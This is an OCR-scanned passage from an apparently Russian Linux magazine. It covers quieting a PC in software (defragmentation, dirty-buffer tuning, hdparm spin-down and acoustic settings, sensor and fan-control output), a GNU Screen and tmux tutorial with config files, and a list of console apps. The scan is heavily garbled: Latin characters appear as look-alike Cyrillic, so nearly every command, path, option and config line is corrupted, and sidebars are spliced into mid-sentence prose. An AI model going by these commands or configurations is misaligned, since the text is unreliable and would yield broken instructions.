Утилита пѵсіоск достаточно много- 
словна для того. чтобы определить, 
что может и чего не можеттвоя 
видеокарта 

сего помощью, надо просто убрать соответс- 
твующую строку из файла /еІсЛзІаЬ (слово зѵѵар 
в третьей колонке). Второй способ включает в 
себя использование наименее подверженных 
фрагментации файловых систем, таких какехЫ, 
и специальныхдефрагментаторов, которые 
позволят собрать разбросанные подиску кусоч- 
ки файлов в один непрерывный блок. Не верь 
тем, кто говорит, что в Ьіпих файловые системы 
не фрагментируются, это просто невозможно 
без потери ощутимого количества свободного 
пространства диска. Фрагментации подверже- 
на и ехі2, и ехі4, и геізегіз, каждая, конечно, в 
разной степени и далеко нетакярко выражено 
какЕАТ, нотем не менее. Для дефрагментации 
любой файловой системы можно использовать 
универсальные дефрагментаторы, например 
беігад ( ЬирУ/ск.коІіѵаз.огд/аррз/беІгад ) или 
Збаке ( ЫТр/Меи.пеі/зЬаке ). Попробуем приме- 
нить второй какболее продвинутый и произво- 
дительный вариант. Переходим на официальную 
страничку проекта и скачиваем последнюю 
версию инсталлятора (збаке-0.99.1 -Ыпих.зЫ, 
делаем его исполняемым и запускаем. Скорее 
всего, не будут учтены некоторые зависимос- 
ти, так что их придется установить вручную. 
Пользователи БеЫап и ІІЬипІи могут уста но вить 
программу с помощью арі, соответствующие 
инструкции приведены на страничке ЬДрУМеи. 
пеі/ар . После окончания установки выполни 
следующую команду, чтобы начать процесс 
дефрагментирования указанного каталога: 

$ зисіо зЬаке -рѵѵ /путь/до/каталога 

Время работы программы может составить от 5 
до 15 минут в зависимости от количества файлов 
и размера каталога. 

Третий способ предпочтительнее и действен- 
нее остальных. Лучший способ заставить диск 
замолчать — просто лишить его работы. Для 
этого можно использовать так называемую отло- 
женную запись на диск. Ни одна операционная 
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» висіо вепвогз 
азЬ100-і2с - 1 - 2с1 

Асіаріег: БМВиз пРогсе2 асіаріег а* 5500 



ѴСоге 1: 


+1.60 V 


(тіп = 


+1.26 V, 


тах = 


+1.90 V) 


+З.ЗѴ : 


+3,26 V 


(тіп = 


+2.96 V, 


шах = 


+3.63 V) 


+5Ѵ : 


+4.84 V 


(тіп - 


+4.49 V, 


тах = 


+5.51 V) 


+12Ѵ : 


+11.73 V 


(тіп = 


+9.55 V, 


тах = 


+14.41 V) 


-12Ѵ ( гезегѵесі) : 


'12,26 V 


(тіп = 


-0.00 V, 


тах = 


-0.00 V) 


-5Ѵ ( гезегѵесі) : 


-5.14 V 


(тіп = 


-0.00 V, 


тах = 


-0.00 V) 


СРи Рап: 


4411 КРМ 


(тіп - 


-1 КРМ, 


сііѵ = 


2) 


СИавзів Рап: 


0 КРМ 


(тіп = 


-1 ПРМ, 


сііѵ = 


2) 


Роме г Рап: 


0 КРМ 


(тіп = 


-1 РРМ, 


сііѵ - 


2) 


М/В Тетр: 


+41.0°С 


(НідН - 


+80 . 0 0 С , 


Нузі = 


= +75 . 0°С ) 


СРУ Тетр (Іп'Ье’І) 


: +26 ♦ 5°С 


(ЬідН = 


+80 , 0°С , 


Нузі - 


= +75 . 0°С) 


Роѵ/ег Тетр: 


-0 . 5°С 


(НідН = 


+80 . 0 °С , 


Нузі: ^ 


= +75 . 0°С ) 


С?и Тетр (АМ0) : 


+25 . 0°С 


(НідН = 


+80 , 0 °С , 


Нузі: = 


= +75.0°С) 


сри0_ѵіс4: 


+1,600 V 











м831785із * І2с - 1 * 2е 

Асіаріег: БМВив пРогсе2 асіаріег а* 5500 
СРІІ Оіосіе : +55.0°С (ИідЬ = +110. 0°С) 

>1 

Команда эепзогэ пакета [т-зепзогз более чем информативна 



система (кроме совсем уж простых) не произво- 
дит за писана диск сразу после записи данных 
вфайл. Сначала информация попадает в буфер, 
в котором хранится определенное время, и 
только затем записывается непосредственно на 
жесткий диск. Такудается существенно поднять 
производительность подсистемы ввода-вы- 
вода и сделать процесс записи на диск более 
равномерным и последовательным. Нас все 
это интересует постольку, поскольку І_іпих 
отличается тем, что позволяет самостоятельно 
задать интервал между сбросами этих самых 
«грязных» буферов. Делается это с помощью 
записи значений в перечисленные в следую- 
щей таблице файлы каталога /ргос/зуз/ѵпп: 

$ 1з -1 /ргос/зуз/ѵш 
1арСор_тобе (12 0) — сколько секунд 
должно пройти между началом чтения 
каких-либо данных и сбросом грязных 
буферов на диск (раз уж после чтения 
данных остановленный ранее диск все 
равно раскрутился, почему бы заодно 
не сбросить буферы?) . 
бігЦу_ѵлгібеЪаск_сепбізесз (12 000) 

— квант времени между проверками на 
наличие грязных буферов . 
бігбу_ехріге_сепбізесз (12000) — че- 
рез сколько миллисекунд считать бу- 
феры достаточно грязными для записи 
на диск. 

бігСу_гакіо (10) — максимальный про- 
цент памяти, используемый для хране- 
ния грязных буферов (при превышении 
они будут сброшены) . 
бігТу_Ъаскдгоипб_гаТіо (1) — мини- 
мальный процент памяти, используемый 
для хранения грязных буферов . 

Трудно сказать, какие значения будут оптималь- 
ными в конкретном случае. В скобкахуказаны 



значения, которые позволят отложить момент 
сброса буферов на достаточно продолжитель- 
ный период времени. 

Если машина, освобождаемая тобой от шума, 
не должна часто использовать жесткий диск, ты 
можешь настроить энергосберегающий режим, 
при котором хард будет отключаться на время 
бездействия. Сделать это можно с помощью 
известной утилиты Мрагт. Например, так: 

$ зибо кбрагт -В 1 -8 12 /беѵ/зба 

Опция '-В 1 ' включает самый «агрессивный» 
уровеньсбережения энергии. Всего их 254, с 1 



по 127 из которых отличаются тем, что приводят к 
остановке винчестера в случае необходимости. 
Опция '-5 12' — это время, по прошествии которо- 
го жестки й ди ск будет оста на вл и вать ш п и н дел ь. 
Предусмотрено 255 значений: с 1 до 240 просто 
умножаются на 5 секунд, а 0 — отключает останов- 
ку шпинделя. Менее губительный для жесткого 
диска метод заключается в активации так назы- 
ваемой функции АиЬтабсАсоизбс МападетепЕ 
благодаря которой позиционер головок будет 
издавать гораздо меньше шума, ценой незначи- 
тельного снижения скорости позиционирования 
головок (что, однако, ведет к падению произво- 
дительности диска в среднем на 1 0%). Функция 
доступна в большинстве более-менее современ- 
ных жестких дисков и может быть включена при 
помощи всетогоже Мрагт. Например: 

$ зибо кбрагт -М 12 8 /беѵ/зба 

Эта команда активирует самый тихий режим ра- 
боты винчестера, за наиболее быстрым закреп- 
лено значение 254. Выбирая значение между 
этими двумя порогами, ты сможешь подобрать 
оптимальное соотношение шум/скорость, но 
помни, что большинство жесткихдисков реаль- 
но поддержи ваеттолько два или три режима 
(например, 128 — тихо, 254 — быстро, все, что 
между, будет либо вообще не работать, либо 
активировать один из двух режимов). 

И, ТИШИНА... 

Какты смогубедиться, снижать уровень созда- 
ваемого компьютером шума программно не 
только можно, но и нужно. В большинстве случа- 
ев этого будет вполне достаточно для того, чтобы 
получить количество децибел, не раздражаю- 
щеетвой слух, без необходимости приобретения 
дорогостоящих кулеров и корпусов. - !" 



Вовремя работы скрипт руѵтсопЛа будет останавливать и изменять 
скорость вращения кулера для определения наилучших значений для 
конфигурационного файла 

ТезТіпд рш сопТго! Нѵтоп0/сіеѵісе/рш1 , 

Нѵтюп0/сІеѵісе/Тап1_іприТ . . . зреесі маз 4440 пом 0 
II арреагз ТЬаТ Тап Ьитопв/сІеѵісе/Тап1_іприТ 
ід сопТ гоііеб Ьу рмт ЬмтопО/сІеѵісе/рмтІ 
Моиісі уои Ііке Іо делегате а сІеТаіІесІ соггеІаТіоп (у)? РММ 255 РАМ 4440 
РИМ 240 РАМ 4470 
РШ 225 РАМ 4166 
Рим 210 РАМ 3879 
Р\ѴМ 195 РАМ 3629 
РѴ/М 180 РАМ 3308 
Рим 165 РАМ 2986 
Рим 150 РАМ 2667 
Рим 135 РАМ О 
Рап ЗТорреб аТ Рим * 135 



ТезТіпд із сотрІеТе. 

Ріеазе ѵегіТу ТЬаФ аіі Рапз Ьаѵе геТигпесІ То тЬеіг погшаі зреесі, 

ТНе ТапсопТгоІ зс гірТ сап аиТотаТісаѴІу гезропсі То ТетрегаТиге сНапдаз 
оТ уоиг зузТет Ьу сКапдіпд Тапзреесіз . 

Оо уои иапТ То зеФ ир ІТ$ сопТідигаТіоп Рііе пом (у) ? у 

иНаТ зНоиЫ Ье ТЬе раТЬ То уоиг РапсопТ гоі сопТід Тііе (/еТс/ФапеопТгоІ) ? | 
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Терминальные мультиплексоры 

и - ключ к эффективному использованию 

консоли 



Программа с незамысловатым названием О N И Зсгееп остается излюб- 
ленным инструментом системных администраторов и ІЛ\І IX- пользова- 
телей со стажем уже на протяжении второго десятка лет. Она настолько 
популярна, что почти всегда попадает на первое место списков незаме- 
нимого арсенала юниксоида. Осгееп посвящен не один десяток увесис- 
тых РАО и статей, опубликованных в самых авторитетныхжурналах. 



Что же в ней такого примечательного? 





[0] Ѳ : [Ітих] * і 1т@] Іт-сіеекіор 18:30:39 ир 1 сіау 




что это? 

Представь, чтоутебя десятокудаленных ма- 
шин, на каждой из которых поднятЗЗН-сервер. 
Каждый деньты подключаешься к ним, чтобы 
просмотретьлоги, оценить работоспособность 
и загруженность систем. Пока выполняемые 
тобой задачи не сложны и сводятся к простым 
действиям в консоли — все в порядке. Однако 
стоиттебе выполнить сразу несколько дейс- 
твий, как начинаются проблемы. На первых 
порах спасает комбинация <СМ+2>, но она 
применима далеко не ко всем приложениям, к 
тому же со временем ты просто запутаешься в 
списке фоновыхзадач, перечисленных в выво- 
де команды рбз. Ты можешь создать дополни- 
тельные ЗЗН-соединения в других эмуляторах 
терминала, но приуправлении сразу несколь- 
кими машинами это создаст большую путаницу. 
Что же делать? 

Зсгееп способен решить все эти проблемы за 
счет мультиплексирования терминала между 
несколькими исполняемыми наудаленной 
машине процессами. Говоря простым языком, 
Зсгееп — это консольный менеджер окон, кото- 
рый создает на удаленном конце ЗЗН-соеди- 
нения нечто вроде мультитабового эмулятора 
терминала. Ты подключаешься кмашине, 
запускаешь команду зсгееп, которая вновь воз- 
вращаеттебе приглашение командной строки. 
Затем ты можешь за пустить команду«1е55/ 
ѵаг/іод/теззадез», нажать <С1г1+АС>, чтобы со- 
здать новое окно, запустить в нем команду Іор, 
в следующем окне запустить ігззі и т.д. В любой 
моментты можешь нажать <СМ+А Р> 
для возвращения к открытому ранее окну. 

И все это в рамках одного ЗЗН-соединения. 
Однако настоящая мощь Зсгееп заключает- 
ся в поддержке сессий. В любой моментты 
можешь нажать <СМ+А 0 >, чтобы отключиться 
от Зсгееп и вновьзапуститьего с ключом 'г', 
чтобы возобновить прерванную сессию со 
всеми открытыми окнами и не измененным 
состоянием приложений. Вся соль втом, 



что сессия сохранятся на машине-сервере, 
поэтому неважно, с какой машины она будет 
возобновлена. Ты начинаешьсессию на работе, 
затем идешь домой и продолжаешь ее оттуда. 
Совсем необязательно бытьсистемным адми- 
нистратором, чтобы полюбить Зсгееп. Многие 
старожилы предпочитают использовать его для 
самых разных вещей, начиная отудаленной 
проверки почты надомашнем компе с помощью 
тиН или аіріпе и заканчивая использованием в 
качестве удобной консольной среды. Особенно 
ценным он может оказаться для пользователей 
устаревших компов, на которых запускХ-серве- 
ра сожрет добрую половину памяти, а тяжелые 
0ТК- и ОТ-приложения — все остальное. К 
этомуже списку можно отнести и нетбуки с про- 
цессорами, работающими на низких частотах, 
и маленькими, как почтовый конверт, экранами 
(кстати, многотабовыетайловые (фреймовые) 
менеджеры, наподобие гаіроізоп, іопЗ и бѵѵт, 
созданы под впечатлением Зсгееп). 

КАК ЭТО ИСПОЛЬЗОВАТЬ? 

Не каждый новичоксразу проникнется кра- 
сотой Зсгееп. И для этого есть две причины. 
Во-первых, для управления оконным менедже- 
ром используется только клавиатура, поэтому 
чтобы начать его использовать, необходимо 
знатьхотя бы базовые клавиатурные комби- 
нации. Во-вторых, по умолчанию Зсгееп не 
сообщает пользователю никакой информации 
об открытых в рамкахтекущей сессии окнах, 
именахзапущенных в них приложений и т.д., 
поэтому навигация между окнами усложняется, 
а при большом их количестве — превращается 
в кошмар. 

Чтобы обойти вторую проблему, мы заранее на- 
пишем конфигурационный файл, включающий 
в себя настройки строки состояния, которая 
будет выводить на экран различную полезную 
информацию. Открой файл -/.зсгеепгс в тек- 
стовом редакторе и добавь в него следующие 
строки: 



$ѵі -/.зсгеепгс 

# Отключаем приветствие 
збагбир_теззаде о 11 

# Включаем ибі8 
бебйббЗ оп 

# Использовать визуальный сигнал 
(мигание экрана) вместо писка ди- 
намика 

ѵЪеІІ оп 

# Размер буфера прокрутки 
беізсгоІІЪаск 1000 

# Производить отключение сессии при 
разрыве связи с терминалом 
аибобебасЪ. оп 

# Открывать Ьодіп-шелл 
зйеіі -$ЗНЕЬЬ 

# Активировать возможность про- 
крутки в хбегт (и других эмуляторах 
терминала) 

бегшсаріпбо хбегт* бі@:бе@ 

# Волшебная строка 
зкеіібібіе ' $ I зЪ. 1 

# Строка состояния 

Ьагбзбабиз аіхѵаузіазбііпе " %{+Ъ ѵ/к} 
%С $ ЬОСИАМЕ @ % Н %= [ ] " 

# По клавише <Езс> создать окно и 
запустить в нем команду зи 

Ьіпб \ 0 3 3 зсгееп -1п -б гооб 9 зи 

Три последних строки файла — ключевые. 
Первая из них задает способ изменения 
названий окон. Зсгееп умеет динамичес- 
ки переименовывать окно в зависимости 
от запущенного в нем приложения. Для 
этого он использует очень простой способ: 
читает ввод пользователя в термин ал ей 
берет эту строку в качестве имени. Чтобы 
понять, когда начать чтение ввода, Зсгееп 
использует запись, указанную в опции 
збеГШе. В нашем случае это строка '$ ІзЬ', 
которая означает, что окно будет названо 
либо именем команды, набранной после 
символов '$ ' (обычно такими символами 
оканчивается приглашение командного 
интерпретатора), либо з И (вариант по 
умолчанию). 

Однако это еще не все. Опция не будет иметь 
смысла, пока мы не поместим следующую пос- 
ледовательность строк в конец файла -/.Ьазбгс: 

сазе $ТЕКМ іп 
зсгееп) 

ехрогб РКОМРТ_СОММАШ = ' есбю -п 
-е " \ 033к\033\\" ' 



езас 

Чтобы названия окон были видны на экране, мы 
создали строку состояния (ЬапМаШз). По мер- 
кам Зсгееп она очень проста, но при этом лако- 
нична и вполне достаточна для повседневного 
использования. Выводимая в ней информация 
будет выглядеть примернотак: 

12:18 изегѲЪозбпате [ 0 зЬ. 1 тс 2* ігззі ] 
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Интеллектуальное размещение регионов в Іт их 



БЛОКИРОВКА ТЕРМИНАЛА СРЕДСТВАМИ ТМІІХ: 



если в данный момент ты работаешь в другом 
окне. Это можно использовать, например, для 
наблюдения за логами или запуска команд 
под управлением команды ѵѵаісб. Зсгееп 
оснащен собственным механизмом копирова- 
ния и вставки. Комбинация <С-а С-[> переводит 
оконный менеджер в режим копирования. После 
этого ты можешь использовать указательные кла- 
виши и пробел для выбора текста и комбинацию 
<С-а С-]> — для вставки. По нажатию комбинации 
<С-а Ь> Зсгееп создаеттекстовые скриншоты, 
которые можно просмотреть с помощью штатной 
утилиты Іезз. С крин шот получает следующее имя: 
Ьагбсору.номер_окна. Если дефолтовые клавиа- 
турные комбинации тебе не подходят, или же ты 
хочешь создать специальные сочетания клавиш 
для вызова часто используемых приложений — 
используй опцию Ьіпсі конфигурационного файла. 
Например, следующая строка "повесит" на 
комбинацию <С-а 5расе> вывод списка открытых 

ОКОН: 



Ъіпб ' ' тпскж1І8б -Ь 



А эта сделаеттак, чтобы после нажатия <С-а 5> 
окно разделялось на два региона: 



Ьіпсі 8 зрііб 



А вот пример запуска приложения с помощью 
клавиатурной комбинации: 



Ьіпсі ш зсгееп -С шаіі шиСС 



После нажатия <С-а т> откроется новое окон 
с именем таіі, и в нем будетзапущен почтовик 
тиШ. Примернотакойже формат записи можно 
использовать для запуска приложений сразу 
после старта Зсгееп: 



зсгееп -С таіі 0 тьШС 

зсгееп -С ігс 1 ігззі 

зсгееп -С доодіе 2 еііпкз іШбр:// 

ѵіѵт. доодіе . сот 



Поместив эти строки в конец файла -/.зсгеепгс и 
заново запустив Зсгееп, ты получишь сразутри 
открытых окна сзапущенными в них тиН, ігззі 
и еііпкз. 



НЕ ЗСРЕЕЫ'ОМ ЕДИНЫ 

Начиная с версии 4.6 ОрепВЗО поставля- 
ется с собственным вариантом Зсгееп под 



зеі -д Іоск-аНег-бте 1800 

зеі-раззѵѵогб -с , $2а$06$7^риТ51 : ^^с2.К^За9ппбЕии^тС.2Е^6НВ^НVVМ^бѵ9/^^2г1 : VVеб^ВНе , 
Ьіпсі \_ іоск-зегѵег 



Слева будут располагаться текущее время 
и имя_пользователя(Оимя_хоста, а справа 
— имена всех открытых окон в квадратных 
скобках. При этом текущее активное окно 
будет помечено звездочкой. Для задания 
строки статуса Зсгееп использует специальные 
символы, похожие нате, что применяются для 
формирования приглашения командного ин- 
терпретатора (значение переменной окружения 
Р51). Прочитав справочную страницу зсгееп, ты 
сможешьузнать о них подробнее. Последняя 
строка — назначение клавиши <Езс> на запуск 
гооПтерминала. 

Теперь после запуска Зсгеепты обнаружишь в 
окнетерминала нетолько безликое приглаше- 
ние командного интерпретатора , но и информа- 
тивную строку состояния. Попробуй запустить 
какую-нибудь интерактивную команду, и ты 
увидишь, какимя окна изменится. 

Перейдем к использованию. Какты мог 
заметить, читая введение, все клавиатурные 
комбинации Зсгееп начинаются с сочетания 
<СМ+А> ( < С-а > как его принято называть в 
документации Зсгееп], за которым следует 
какая-либо клавиша. Наиболее используемые 
комбинации это <С-а о для создания нового 
окна, а также сочетания клавиш для перехода 
между окнами. Они перечислены в следующей 
таблице: 

Наиболее используемые 
комбинации клавиш Зсгееп 

С-а 0 . .9 переход между окнами 0 . . 9 
С-а " показать список всех окон 

С-а п перейти в следующее окно 

С-а р перейти в предыдущее окно 



С-а с 


создать новое окно 


С-а к 


уничтожить текущее окно 


С-а С-а 


перейти в предыдущее окно 


С-а 5 


разделить экран на два 


региона 


по горизонтали 


С-а 1 


разделить экран на два 


региона 


по вертикали 


С-а ТаЬ 


переход между регионами 


С-а г 


склеить два разделенных 


региона 




С-а (1 


отсоединиться от зсгееп 


С-а М 


начать наблюдение за те- 


кущим окном 


С-а ? 


справка обо всех комбина- 


циях клавиш 


С-а : 


командная строка Зсгееп 



Ты уже знаком с механизмом сессий и комби- 
нацией <С-а б>, добавлю только то, что Зсгееп 
умеет сохранять и поддерживать сразу не- 
сколько сессий. Ты можешь начать сессию для 
редактирования конфигурационных файлов, 
затем отключиться от нее, начать новую сессию 
(просто запустив зсгееп], а затем вернуться к 
предыдущей. Для этого достаточно передать 
'-із' в качестве аргумента команды зсгееп, ско- 
пировать имя одной из перечисленных сессий 
и передать его в качестве опции аргумента '-г'. 
Болеетого, тебе никто не помешает подце- 
питься куже подключенной с другой машины 
сессии с помощью аргумента ’-х', переданного 
вместо '-г'. Очень полезной может оказаться 
комбинация <С-а М>, предназначенная для 
наблюдения за выбранным окном. После 
ее нажатия обо всех происходящих в окне 
изменениях Зсгееп будет сообщать тебе, даже 
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названием {тих. Как и его 0Р1_-собрат, {тих является 
терминальным оконным менеджером, который отлича- 
ется отЗсгееп следующими характеристиками: 

• Клиент-серверная архитектура, при которой окна 
выполняют роль объектов, которые могут одновременно 
подключаться к нескольким сессиям, перемещаться 
между ними и просматриваться с разных клиентов 
(терминалов]. 

• Механизм автоматизации выполняемых действий с 
помощью скриптов. 

• Несколько независимых буферов обмена. 

• Два варианта раскладки клавиатуры: стиль ѵі и етасз. 

• Более ясный форматописания строки статуса. 

• Возможность отображения вывода команды в строке 
статуса. 

• Экономное расходование оперативной памяти. 

• Высокая скорость работы. 

• Улучшенная поддержка ІІТР-8. 

• Интерактивные меню для выбора окон, сессий и клиентов. 

• Более гибкие возможности по разделению окон на реги- 
оны. 

Несмотря на принадлежность к ОрепВБОДтих спо- 
собен работать на множестве ІЛ\І IX- систем, включая 
РгееВЗБ, І\Іе{В50, Біпих, Мае 05 X, Зоіагіз и АІХ. Бинар- 
ные пакеты {тих уже доступны в репозиториях БеЬіап 
ЗісІ и ІІЬип{и Кагтіс.а исходники могут быть получены с 
официальной странички {тих в интернете: Ь{{ р :А 
5оигсе{огде.пе{ . Запустив {тих, ты сразу заметишь 
его отличия отЗсгееп. Во-первых, статусная строка 
активирована поумолчаниюи включает в себя почти 
всю ту информацию, для получения которой в 5с гее п 
нам пришлось добавлять в кон фи г довольно странные 
строки. Во-вторых, комбинация <С-а> не срабатывает, 
и вместо нее следует использовать <С-Ь>. Это не очень 
удобно, но необходимо в целях устранения конфликтов 
со Зсгееп (при запуске одного в другом). За исключе- 
нием префикса в виде < С- Ь > , большинство клавиатур- 
ных комбинаций совместимы со Зсгееп. Так, <С-Ь о 
открывает новое окно, а <С-Ь 1 > приводит к переходу 
к окну номер один. В то же время некоторые действия 
выполняются с помощью других сочетаний клавиш. 
Например, <С-Ь ѵѵ> 

— это меню открытых окон, <С-Ь 1> — предыдущее окно, 
<С-Ь "> — разделить окно по вертикали, уничтожает 
окно комбинация <С-Ь&>.Для отключения от сессии 
используется все та же комбинация < С - Ь сі > , 
однако для подключения обратно используется другой 
аргумент командной строки: 

$ Стих аббасП 

Отличительной особенностью {тих является также и то, что 
любое действие, выполняемое с помощью клавиатурных 
комбинаций, можно произвести из командной строки. На- 
пример, для перехода к предыдущему окну следует использо- 
вать следующую команду: 

$ Стих ІазС-міпсІом 

А для создания окна такую: 

$ Стих пеіл-чліпскж 

Весь перечень поддерживаемых команд можно получитьтак: 
$ Стих Іізб-соттапбз 
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> ѵѵагпіпд 

По умолчанию {тих 
запускает прописан- 
ные в конфигурации 
статусной строки 
команды примерно 
каждые 1 5 секунд (на 
самом деле все за- 
висит отактивности 
пользователя], поэто- 
му чтобы не схватить 
тормоза, неделай ее 
слишком сложной. 



Несколько окон Бегее п могут одновременно находиться на 
экране 



Команды в {тих играют ключевую роль, с их помощью 
производится конфигурирование программы, они выступают 
в качестве аргументов команды Ьіпб, предназначенной для 
переназначения клавиш, и могутбыть использованы для 
автоматизации рутинныхдействий иуправления {тих из 
другой программы. 

Конкретно для конфигурирования {тих предназначены две 
команды. Одна из нихноситимя зе{-ор{іоп и служит изменению 
параметров сессии, вторая называется зе{-\л/іпсІоѵѵ-ор{іопи 
используется для изменения насгроекокон. У них обеих есть 
сокращенный вариант(зе{ и зеблфатакже возможность изменять 
локальные и глобальные опции с помощью флага '-д'. Каки в любой 
другой программе, проверка первых осуществляется в первую оче- 
редь, и, если неустановлена локальная опция, значение берется из 
глобальной. Получитьсписоквсехвозможныхопцийможнотак: 

$ Стих збюіл-орбіопз 
$ Стих зЬом-іліпсІом-орбіопз 

Более подробно они описаны в тап-странице. Воспользуем- 
ся этой информацией, чтобы создать небольшой конфигура- 
ционный файл: 

$ ѵі ~/ . Стих . сопб 

# Изменяем цвет строки статуса на белый 
зеб -д збабиз-Ъд «Мбе 

# Изменяем правую часть статусной строки 

зеб -д збабиз-гідИб '#(есбю $ІІ5ЕК) @#Н # (ирбіте 
I сиб -б " , " -б 1 ) ' 

# Навигация по командной строке и списку окон в 
режиме ѵі 

зеб -д збабиз-кеуз ѵі 
зебм -д тобе-кеуз ѵі 

# Размер буфера истории 
зеб -д кізбогу-іітіб 1000 

# Меняем стандартный префикс на <С-а> 
зеб -д ргебіх С-а 

ипЬіпб С-Ь 

# Переход к предыдущему окну по <С-а С-а> 

Ьіпб С-а Іазб-міпскхл 

# <С-а М> включает мониторинг активности 
Ьіпб М зебтл топібог-асбіѵібу оп 

# <С-а /> — запустить бор 
Ъіпб / пеѵт ' ехес бор 1 




> іпіо 

После нажатия ком- 
бинации <С-Ь{>{тих 
выведет на экран 
большие часы, нари- 
сованные псевдогра- 
фикой. Они останутся 
на экране до нажатия 
любой клавиши. 
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Ітих и окно справки 



ДЖЕНТЛЬМЕНСКИМ НАБОР КОНСОЛЫЦИКА 



В 2010-м году невозможно представить себе ІЛ\І IX без удобной 
графической среды, менеджеров окон и 30-эффектов. Однако 
для обладателей неторопливых компов и тех, кто использует II N IX 
удаленно и не может похвастаться высокоскоростным соедине- 
нием, все это оказывается недоступно. Приходится прибегать к 
консольным аналогам больших графических приложений (которые 
в большинстве своем оказываются намного удобнее]. 

• Браузер еііпкз ( ЬДрУ/еИпкз.ог.сг ]. Невероятно продвинутый для 
своих размеров браузер, поддерживающий та блицы и фреймы, 
цвета, кукисы, ЭаѵаБсгір!, аутентификацию, закладки, фоновые 
загрузки, скриптинг (Регі, І_иа, Оиііе]. 

• Почтовикаіріпе ( ѵѵѵѵѵѵ.ѵѵазЫпаІоп.еби/аІріпе ). Простой в исполь- 
зовании почтовый клиенте псевдографическим интерфейсом. 
Пришел на сменууже давно заброшенного обладателя многих 
наград ріпе. Поддерживает все стандарты и технологии, которые 
могуттолько потребоваться почтовой программе. В отличие от 
тин, имеет встроенные файловый браузер, редактор, настройщик 
и умеет отправлять письма без помощи внешних программ. 

• ІМ-клиентсепІегіт ( ѵѵѵѵѵѵ.сепІегііттогд/іпсІех.рЬр/Маіп Раде ]. 
Форкмультипротокольного ІМ-клиента сепіегісц. Обладает при- 
ятным и удобным в использовании интерфейсом. Поддерживает 
следующие протоколы: ІСО, Ѵабоо!, АІМ ТОО, ІРС, М5ІМ, баби-баби 
и баЬЬег. В отличие от многих других консольных приложений, 
настраивается с помощью графического интерфейса. 

• ТѵѵіДег-клиент ДѵДег ( іл/ѵѵіл/.Ііообдар.соітѴзоІіѵѵаге/ДѵІТег ]. Ин- 
терактивный ТѵѵіДег- клиент, написанный на Регі. Поддерживает 
скриптинги может работать в режиме демона (или бота, кому как 
больше нравится]. 

• Словарьзбсѵ ( ЬіірУ/збсѵ.зоигсеіогде.пеі І. Консольная версия 
популярной программы для поиска в словарях ЗіагБісТ Поддержи- 
вает все словари своего старшего собрата и может использоваться 
для поиска слов из командной строки. 




Для конфигурирования статусной строки предназначены две опции: 
зіаШз-ІеД и зФШз-пдб!. Первая изменяетлевую часть, вторая — правую. 
В отличие отЗсгееп, ихформаточень прост: 



# (команда) 

(первая строка) 

#Н — имя хоста 
#8 — имя текущей сессии 
#Т — имя текущего окна 
## — символ # 



результат выполнения указанной команды 



Каквидно из конфига, я не стал менять левую часть строки, она и 
без того неплохо выглядит. Однако в правую я поместил ин- 
формацию^ пол ьзователейхосте, текущем времени и аптайме, 
который формируется с помощью вызова команд «есбо $115 ЕР» 
имя пользователя], «ирЕіте I си! - б 1» (время и аптайм] и 

переменной #Н. 

Последняя строка файла демонстрирует пример использования 
команд Ьіпб и пеѵѵ-ѵѵіпбоѵѵ (пеѵѵѵѵ). Однако последняя может быть 
применена не только для закрепления функций запуска приложений 
за клавиатурными комбинациями, но и для создания сессий, напри- 
мер. Помести в ко нфи г следующие три строки, запусти Ітих с опцией 
аі!асб, и ты получишь три окна.впервомиз которых запущен шелл, 
во втором пли!!, а в третьем ігззі: 



пем -сі 
пеѵлт -сі шиСС 
пеѵлт -сі ігззі 



Первая строка — сокращенный вариант команды пеѵѵ-зеззіоп, 
предназначенной для создания сессии. Вторые две создают окна. 
Флаг ’-сГ нужен для того, чтобы после создания окна Ітих не сделал 
его текущим. 

Более развитая система разбиения окон на регионы — еще 
одна отличительная особенность Ітих. В отличие от 5с гее п, для 
разделения окна вертикально на два равных региона исполь- 
зуется комбинация <С-Ь ">, а для переключения между регио- 
нами — либо комбинация <С-Ьо>,либо <С-Ь> и навигационные 
клавиши. Изменить размер региона можно с помощью комбина- 
ций <С-ЬА1!-11р> и <С-Ь АІ!-Ооѵѵп>. Однако основная изюминка 
скрывается в поддержке нескольких вариантов размещения 
регионов, для переключения между которыми предназначе- 
на комбинация <С-Ь5расе>. В частности, регионы могут быть 
расположены горизонтально, вертикально, интеллектуально, 
с выравниванием или без. Это может быть непонятно в теории, 
поэтому советую просто поэкспериментировать. 



I 



Вместо конфигурационных файлов сепіегіт предла- 
гает удобное окно настройки 
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> СІѴСІ 

На прилагаемом 
кжурналу диске ты 
найдешь последние 
версии зсгееп и 1тих р 
а также примеры 
конфигурационных 
файлов. 




НТТР://ѴѴѴШ 



"■ Г 

> Ііпкз 

ЫірѴ/сІі-аррз.оп — 
каталог консольных 
приложений 



«Улучшенная» поддержка ЦТГ-8вІтихоказаласьнетакхороша.какзаявляет разработ- 
чик [ЫісЬоІаз МагтіоЦІ 



ЗАКЛЮЧЕНИЕ 

Консольные менеджеры окон, такие как 6І\Ш Зсгееп 
и Ітих, существенно упрощают жизнь в консоли. 
Они не только позволяют разделить физический 



терминал между несколькими приложениями, но и 
создают целую рабочую среду, познакомившись с 
которой однажды, ты уже никогда не сможешь рабо 
тать без нее. ц-с 
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ІЛМІХОЮ 



■ ■ Юрий «Асіері» Видинеев асіерідгадтаіі.сот 



* 






за прописку 
на нетбуке 

Выбираем дистрибутив Ыпихдля 
мини-ноутбука 



Как правило, на новый нетбук предустановлен либоурезанный Ыпих, 
либо донельзя ограниченная винда (в последнее время — ѴѴі псіоѵѵб 7 
Зіагіег, где даже обои на рабочем столе просто так не поменяешь). Нет, 
такая ОС никуда не годится! Предлагаю сменить ее на что-нибудь получ- 
ше — за место на твоем винте/550 будут бороться 4 претендента. 



І_ЕТ'5 МОКТАІ. КОМБАТ ВЕ6Ш 

Свое победоносное шествие по планете 
нетбуки начали около двух лет назад (если 
за начальную точку отсчета взять Азиз Еее 
РС 701) — и сразу же, как грибы после дождя, 
стали появляться скрипты для оптимизации, 
специализированные репозитории, а затем и 
специализированные дистрибутивы. Редкий 
известный дистрибутив не обзавелся каким- 
нибудь нетбуко-ориентированным респином. 
Некоторые изтаких сборокдаже ориентиро- 



ваны только на устройства от конкретного про- 
изводителя (например, І_іпих40пе и Кикі Ыпих 
для линейки АсегАзріге Опе или І_ееепих для 
Еее РС). Однако, большинство этих респинов 
как возникли, так и канули вЛету— в конкурен- 
тной борьбе выжили только лучшие. Предлагаю 
рассмотреть активные на сегодняшний день, 
атакже перспективные дистрибутивы с целью 
выбора Озе без! оіЧЬе ЬезЕ 
